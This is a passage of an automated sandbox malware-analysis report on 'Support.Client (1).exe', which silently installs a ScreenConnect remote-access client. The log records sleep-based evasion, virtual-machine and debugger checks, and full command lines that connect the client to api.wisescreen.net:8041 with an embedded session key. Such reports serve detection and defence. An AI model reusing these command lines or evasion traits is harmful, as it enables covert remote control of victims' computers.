                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -594484s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -594375s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -594266s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -594156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -594047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -593938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -593807s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -593703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -593594s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -593469s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -593360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -593235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -593110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -592985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -592838s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -592610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -592379s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -592250s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -592141s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -592031s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -591922s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -591813s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076Thread sleep time: -591688s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 1620Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe TID: 7500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe TID: 7536Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe TID: 7760Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\Support.Client (1).exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Support.Client (1).exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599668Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599560Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599444Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599195Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597260Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597112Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595055Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593807Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592838Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592379Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 591922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 591813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 591688Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\Jump to behavior
                  Source: Amcache.hve.4.drBinary or memory string: VMware
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2548739269.000002CAF4DF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2933814122.00000289A7858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2931862362.00000289A222B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2A59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWte
                  Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.2943100144.0000000004750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                  Source: dfsvc.exe, 00000001.00000002.2548739269.000002CAF4E06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`n
                  Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00614573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00614573
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00611000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00611000
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00613677 mov eax, dword ptr fs:[00000030h]0_2_00613677
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00616893 GetProcessHeap,0_2_00616893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Support.Client (1).exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00611493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00611493
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00614573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00614573
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_0061191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0061191F
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00611AAC SetUnhandledExceptionFilter,0_2_00611AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 748Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\22k7ydel.ejg\caepj7q4.xnd\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\screenconnect.clientservice.exe" "?e=support&y=guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=bgiaaackaabsu0exaagaaaeaaqdtq8jitjvfazpjsqj2xeoaqakfozz605yz6hyiv8m7oonlwfdwfe3v2tudeo1xgqjdiuzvf4job0h77n%2f3xydpec8%2bixvzfdeeqv6zmkted4w4v7cairb78fnannqhdatnnocwxvax3zjxyij2eh8ckvfr9wwips1vkpom9jtq4tpgxx%2fag0amdztc1v7ah7ztajobrnevdo1msjod7ol713mysjac5clryhpejuocgahv9uunovpvt51njb5fuzvgwp32mcuwprjpolaxfruswom879couphd68bexmxshqan9sldljj53kqwsixmtr1whx2%2b2ghrj3qgw9exo8o8&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\22k7ydel.ejg\caepj7q4.xnd\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\screenconnect.clientservice.exe" "?e=support&y=guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=bgiaaackaabsu0exaagaaaeaaqdtq8jitjvfazpjsqj2xeoaqakfozz605yz6hyiv8m7oonlwfdwfe3v2tudeo1xgqjdiuzvf4job0h77n%2f3xydpec8%2bixvzfdeeqv6zmkted4w4v7cairb78fnannqhdatnnocwxvax3zjxyij2eh8ckvfr9wwips1vkpom9jtq4tpgxx%2fag0amdztc1v7ah7ztajobrnevdo1msjod7ol713mysjac5clryhpejuocgahv9uunovpvt51njb5fuzvgwp32mcuwprjpolaxfruswom879couphd68bexmxshqan9sldljj53kqwsixmtr1whx2%2b2ghrj3qgw9exo8o8&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\22k7ydel.ejg\caepj7q4.xnd\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\screenconnect.clientservice.exe" "?e=support&y=guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=bgiaaackaabsu0exaagaaaeaaqdtq8jitjvfazpjsqj2xeoaqakfozz605yz6hyiv8m7oonlwfdwfe3v2tudeo1xgqjdiuzvf4job0h77n%2f3xydpec8%2bixvzfdeeqv6zmkted4w4v7cairb78fnannqhdatnnocwxvax3zjxyij2eh8ckvfr9wwips1vkpom9jtq4tpgxx%2fag0amdztc1v7ah7ztajobrnevdo1msjod7ol713mysjac5clryhpejuocgahv9uunovpvt51njb5fuzvgwp32mcuwprjpolaxfruswom879couphd68bexmxshqan9sldljj53kqwsixmtr1whx2%2b2ghrj3qgw9exo8o8&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00611BD4 cpuid 0_2_00611BD4
